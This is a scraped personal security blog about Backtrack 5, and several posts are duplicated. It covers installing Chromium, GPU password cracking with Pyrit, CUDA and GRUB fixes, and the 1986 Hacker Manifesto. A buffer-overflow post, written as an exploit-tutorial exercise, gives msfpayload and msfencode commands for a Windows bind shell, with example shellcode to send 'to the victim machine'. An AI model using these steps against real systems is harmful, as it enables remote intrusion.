As many of you have noticed Google Chrome doesn't come installed in Backtrack 5.
So, in this post we will learn how to install it.
The installation was made in Backtrack 5 R3.
Step 1
Open a new command session and type:
apt-get install chromium-browser
Step 2
Access the chrome browser directory:
cd /usr/lib/chromium-browser
All IT Security
Saturday, November 10, 2012
Buffer Overflow - Some thoughts
In this post I'll talk about Buffer Overflow Exploitation in Windows.
Have in mind that this is not intentioned to make you learn, or anything like that, this blog is for personal use, and will contain info that I don't wanna lose or forget. Anyway, I share with everyone, so that it can be helpful for other people.
I learn about buffer overflow from the below link, one of the many tutorials of corelan team:
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
That is an extremely good tutorial, one that you actually can follow, and understand, and specially one that you can test yourself.
At the end of the tutorial, you have a type of challenge, where you should be able to make your shellcode to be able to get a telnet connection on the remote computer, getting that shellcode to insert on the exploit is the challenge part.
The way I found to do it was:
Get the payload from the msfpayload:
That will create the shell code of a telnet connection with an open port at 4444(default)
Now, if you test it, it will not work, because it have probably null's and bad chars not supported on the RMtoMP3 application, so we have to use and encoder.
Here come's the trick:
Step 1
Imagine this is the shell code(this is just and example):
what you have to do, is create a scrip, that write the shell code in a binary file.
For this example, I will use perl as script language:
Step 2
After running the script you will have a shellcode.bin file. So now, is time to use our encoder:
Where:
-e ... -> is the type of encoder you wanna use. you can get a list of then using msfencode -l
-b ... -> is the characters you want to avoid, in this case the null
-i ... -> is the file you want to encode
and
-t ... -> is the output file format
With this all set, you just now have the correct shell code, and now just need to add it to your own exploit.
Send it to the victim machine and Voilá!!!
Have in mind that this is not intentioned to make you learn, or anything like that, this blog is for personal use, and will contain info that I don't wanna lose or forget. Anyway, I share with everyone, so that it can be helpful for other people.
I learn about buffer overflow from the below link, one of the many tutorials of corelan team:
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
That is an extremely good tutorial, one that you actually can follow, and understand, and specially one that you can test yourself.
At the end of the tutorial, you have a type of challenge, where you should be able to make your shellcode to be able to get a telnet connection on the remote computer, getting that shellcode to insert on the exploit is the challenge part.
The way I found to do it was:
Get the payload from the msfpayload:
msfpayload windows/shell_bind_tcp
That will create the shell code of a telnet connection with an open port at 4444(default)
Now, if you test it, it will not work, because it have probably null's and bad chars not supported on the RMtoMP3 application, so we have to use and encoder.
Here come's the trick:
Step 1
Imagine this is the shell code(this is just and example):
\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18
\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b
\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac
\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4
\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58
\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b
what you have to do, is create a scrip, that write the shell code in a binary file.
For this example, I will use perl as script language:
#!/usr/bin/python
shell = ("\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b")
file = open('shellcode.bin','w')
file.write(shell)
file.close()
Step 2
After running the script you will have a shellcode.bin file. So now, is time to use our encoder:
msfencode -e x86/alpha_upper -b '\x00' -i Desktop/shellcode.bin -t c
Where:
-e ... -> is the type of encoder you wanna use. you can get a list of then using msfencode -l
-b ... -> is the characters you want to avoid, in this case the null
-i ... -> is the file you want to encode
and
-t ... -> is the output file format
With this all set, you just now have the correct shell code, and now just need to add it to your own exploit.
Send it to the victim machine and Voilá!!!
Saturday, November 3, 2012
Install Pyrit and the same as CUDA but now for ATI
In this post I was about to present here the opponent of CUDA.
If you have a nVIDIA driver you should use CUDA, and for that you should follow this link:How to Install Cuda on nVIDIA Optimus
If that's not your case and you have an ATI you should go for OpenCL.
I could make a tutorial here, how to install it, but actually in backtrack wiki you can find a very good one, done with the contribution of "g0tmi1k". Check it here: http://www.backtrack-linux.org/wiki/index.php/Install_OpenCL
I'll show you some result I got using pyrit:
Hardware:
Running in 32Gb USB drive
OS: Backtrack 5 R3
Display Card: AMD Radeon HD 6950 DirectCUII 1GB GDDR5
CPU: Core 2 Quad Q6600 2.4Ghz
RAM: 4096MB
As far as I can say, I advice the use of ATI drives to crack passwords, because they are really much faster then CUDA imo.
If you have a nVIDIA driver you should use CUDA, and for that you should follow this link:How to Install Cuda on nVIDIA Optimus
If that's not your case and you have an ATI you should go for OpenCL.
I could make a tutorial here, how to install it, but actually in backtrack wiki you can find a very good one, done with the contribution of "g0tmi1k". Check it here: http://www.backtrack-linux.org/wiki/index.php/Install_OpenCL
I'll show you some result I got using pyrit:
Hardware:
Running in 32Gb USB drive
OS: Backtrack 5 R3
Display Card: AMD Radeon HD 6950 DirectCUII 1GB GDDR5
CPU: Core 2 Quad Q6600 2.4Ghz
RAM: 4096MB
As far as I can say, I advice the use of ATI drives to crack passwords, because they are really much faster then CUDA imo.
How to Install CUDA on nVIDIA Optimus with Backtrack 5 R3
In this post you will learn how to setup a notebook with nVidia Optimus technology working with CUDA.All this information that I will present you here, would not be possible without the help of "Samiux" that helped me to pass through this problem.
You can find his blog here: http://samiux.blogspot.hk
This was tested in my own notebook with the below specs:
Brand : Asus n82jv-vx072v
CPU : Intel i5 450M, 2.4Ghz
RAM : 4096MB DDR3 1066
Display card : nVidia GeForce GT335M 1G VRAM DDR3
Fix Blank Screen when using Startx
When Backtrack 5 was released, the most common issue was blank screen when
using "startx" command to start the GUI mode. This common issue is caused by
the unsupport drivers of VGA on some machines. This blank screen issue is still
found on Backtrack 5 R1,R2 and recently Backtrack R3.
When I install Backtrack 5 R3 I came across this problem, but managed to find a fix:
What we need to do is add some code to the Grub file.
If you're using a live CD or live USB you will come across with the below menu, and there you should select the "Default Boot Text Mode" and press "Tab".
You should then, add the following code "i915.modeset=1" to the grub editor after the "vga = 791 splash text" and then press[enter].as
Find the line that says:
GRUB_CMDLINE_LINUX_DEFAULT
and add the same code "i915.modeset=1" after the "vga = 791 splash text".
After it issue:
It should be working properly now.
If not, check my next two Fix's.
When I install Backtrack 5 R3 I came across this problem, but managed to find a fix:
What we need to do is add some code to the Grub file.
If you're using a live CD or live USB you will come across with the below menu, and there you should select the "Default Boot Text Mode" and press "Tab".
You should then, add the following code "i915.modeset=1" to the grub editor after the "vga = 791 splash text" and then press[enter].as
If after installing Backtrack the problem persist you should then edit the Grub configuration file located in /etc/default/grubFind the line that says:
GRUB_CMDLINE_LINUX_DEFAULT
and add the same code "i915.modeset=1" after the "vga = 791 splash text".
After it issue:
update-grub
and fix-splash
commands. It should be working properly now.
If not, check my next two Fix's.
The Hacker Manifesto
My 1st post will go to this important manifesto in the hacker community.
The Manifesto, was writen in 1986 by Loyd Blankenship aka "The Mentor".
You can find the Manifesto below in text and in mp3 with "The Mentor" reading his own Manifesto and talking about it and his history.
The Manifesto, was writen in 1986 by Loyd Blankenship aka "The Mentor".
You can find the Manifesto below in text and in mp3 with "The Mentor" reading his own Manifesto and talking about it and his history.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The following was written shortly after my arrest... \/\The Conscience of a Hacker/\/ by +++The Mentor+++ Written on January 8, 1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me... Or thinks I'm a smart ass... Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us will- ing pupils, but those few are like drops of water in the desert. This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike. +++The Mentor+++ _______________________________________________________________________________The Hacker Manifesto by "The Mentor".mp3
Subscribe to:
Posts (Atom)